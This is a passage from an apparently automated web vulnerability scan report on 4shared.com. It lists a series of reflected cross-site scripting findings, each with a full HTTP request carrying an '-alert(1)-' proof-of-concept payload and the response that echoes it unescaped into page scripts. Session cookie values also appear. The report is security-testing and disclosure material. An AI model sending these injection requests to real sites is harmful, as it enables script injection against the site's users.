Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-487009560-1311947805463

Response

HTTP/1.1 404 /favicon.icof195b&quot;-alert(1)-&quot;6b92c01de75
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:00:35 GMT
Content-Length: 38597


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4share
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/favicon.icof195b"-alert(1)-"6b92c01de75";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

2.26. http://www.4shared.com/icons/16x16/doc.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /icons/16x16/doc.gif

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 52e34'-alert(1)-'13a44c1832a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /icons52e34'-alert(1)-'13a44c1832a/16x16/doc.gif HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/enterprise/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; fp=4sess_p8b7fcdae_t20110729-145753_; ppage=P2; ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; ppVisitDate=1311947944960; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 /icons52e34'-alert(1)-'13a44c1832a/16x16/doc.gif
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:01:50 GMT
Content-Length: 38843


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
if(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/icons52e34'-alert(1)-'13a44c1832a/16x16/doc.gif',
remember : true


},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}


...[SNIP]...

2.27. http://www.4shared.com/icons/16x16/doc.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /icons/16x16/doc.gif

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 63ec5"-alert(1)-"465cf6cad14 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /icons63ec5"-alert(1)-"465cf6cad14/16x16/doc.gif HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/enterprise/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; fp=4sess_p8b7fcdae_t20110729-145753_; ppage=P2; ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; ppVisitDate=1311947944960; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 /icons63ec5&quot;-alert(1)-&quot;465cf6cad14/16x16/doc.gif
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:01:34 GMT
Content-Length: 38664


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/icons63ec5"-alert(1)-"465cf6cad14/16x16/doc.gif";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

2.28. http://www.4shared.com/icons/16x16/doc.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /icons/16x16/doc.gif

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3d7a'-alert(1)-'1820722bad5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /icons/16x16f3d7a'-alert(1)-'1820722bad5/doc.gif HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/enterprise/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; fp=4sess_p8b7fcdae_t20110729-145753_; ppage=P2; ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; ppVisitDate=1311947944960; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 /icons/16x16f3d7a'-alert(1)-'1820722bad5/doc.gif
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:02:20 GMT
Content-Length: 38846


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
eof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/icons/16x16f3d7a'-alert(1)-'1820722bad5/doc.gif',
remember : true


},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

funct
...[SNIP]...

2.29. http://www.4shared.com/icons/16x16/doc.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /icons/16x16/doc.gif

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41f2f"-alert(1)-"0980582323e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /icons/16x1641f2f"-alert(1)-"0980582323e/doc.gif HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/enterprise/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; fp=4sess_p8b7fcdae_t20110729-145753_; ppage=P2; ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; ppVisitDate=1311947944960; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 /icons/16x1641f2f&quot;-alert(1)-&quot;0980582323e/doc.gif
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:02:18 GMT
Content-Length: 38847


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/icons/16x1641f2f"-alert(1)-"0980582323e/doc.gif";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

2.30. http://www.4shared.com/icons/16x16/doc.gif [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /icons/16x16/doc.gif

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 38c57'-alert(1)-'713458ffaa1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /icons/16x16/doc.gif38c57'-alert(1)-'713458ffaa1 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/enterprise/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; fp=4sess_p8b7fcdae_t20110729-145753_; ppage=P2; ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; ppVisitDate=1311947944960; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 /icons/16x16/doc.gif38c57'-alert(1)-'713458ffaa1
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:02:40 GMT
Content-Length: 38668


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
nBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/icons/16x16/doc.gif38c57'-alert(1)-'713458ffaa1',
remember : true


},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ensu
...[SNIP]...

2.31. http://www.4shared.com/icons/16x16/doc.gif [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /icons/16x16/doc.gif

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73494"-alert(1)-"fc552754d84 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /icons/16x16/doc.gif73494"-alert(1)-"fc552754d84 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/enterprise/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; fp=4sess_p8b7fcdae_t20110729-145753_; ppage=P2; ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; ppVisitDate=1311947944960; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 /icons/16x16/doc.gif73494&quot;-alert(1)-&quot;fc552754d84
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:02:38 GMT
Content-Length: 38665


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/icons/16x16/doc.gif73494"-alert(1)-"fc552754d84";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

2.32. http://www.4shared.com/icons/16x16/pdf.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /icons/16x16/pdf.gif

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9d1d"-alert(1)-"62c133ebe14 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /iconsa9d1d"-alert(1)-"62c133ebe14/16x16/pdf.gif HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/enterprise/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; fp=4sess_p8b7fcdae_t20110729-145753_; ppage=P2; ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; ppVisitDate=1311947944960; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 /iconsa9d1d&quot;-alert(1)-&quot;62c133ebe14/16x16/pdf.gif
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:01:18 GMT
Content-Length: 38846


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/iconsa9d1d"-alert(1)-"62c133ebe14/16x16/pdf.gif";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

2.33. http://www.4shared.com/icons/16x16/pdf.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /icons/16x16/pdf.gif

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80188'-alert(1)-'26d55ecf382 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /icons80188'-alert(1)-'26d55ecf382/16x16/pdf.gif HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/enterprise/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; fp=4sess_p8b7fcdae_t20110729-145753_; ppage=P2; ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; ppVisitDate=1311947944960; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 /icons80188'-alert(1)-'26d55ecf382/16x16/pdf.gif
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:01:24 GMT
Content-Length: 38843


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
if(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/icons80188'-alert(1)-'26d55ecf382/16x16/pdf.gif',
remember : true


},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}


...[SNIP]...

2.34. http://www.4shared.com/icons/16x16/pdf.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /icons/16x16/pdf.gif

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9477"-alert(1)-"b2ce96558c1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /icons/16x16d9477"-alert(1)-"b2ce96558c1/pdf.gif HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/enterprise/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; fp=4sess_p8b7fcdae_t20110729-145753_; ppage=P2; ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; ppVisitDate=1311947944960; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 /icons/16x16d9477&quot;-alert(1)-&quot;b2ce96558c1/pdf.gif
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:01:55 GMT
Content-Length: 38668


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/icons/16x16d9477"-alert(1)-"b2ce96558c1/pdf.gif";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

2.35. http://www.4shared.com/icons/16x16/pdf.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /icons/16x16/pdf.gif

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71d07'-alert(1)-'305d79af2e7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /icons/16x1671d07'-alert(1)-'305d79af2e7/pdf.gif HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/enterprise/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; fp=4sess_p8b7fcdae_t20110729-145753_; ppage=P2; ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; ppVisitDate=1311947944960; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 /icons/16x1671d07'-alert(1)-'305d79af2e7/pdf.gif
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:02:17 GMT
Content-Length: 38664


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
eof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/icons/16x1671d07'-alert(1)-'305d79af2e7/pdf.gif',
remember : true


},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

funct
...[SNIP]...

2.36. http://www.4shared.com/icons/16x16/pdf.gif [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /icons/16x16/pdf.gif

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b6ec"-alert(1)-"2980afcb236 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /icons/16x16/pdf.gif1b6ec"-alert(1)-"2980afcb236 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/enterprise/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; fp=4sess_p8b7fcdae_t20110729-145753_; ppage=P2; ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; ppVisitDate=1311947944960; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 /icons/16x16/pdf.gif1b6ec&quot;-alert(1)-&quot;2980afcb236
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:02:34 GMT
Content-Length: 38665


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/icons/16x16/pdf.gif1b6ec"-alert(1)-"2980afcb236";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
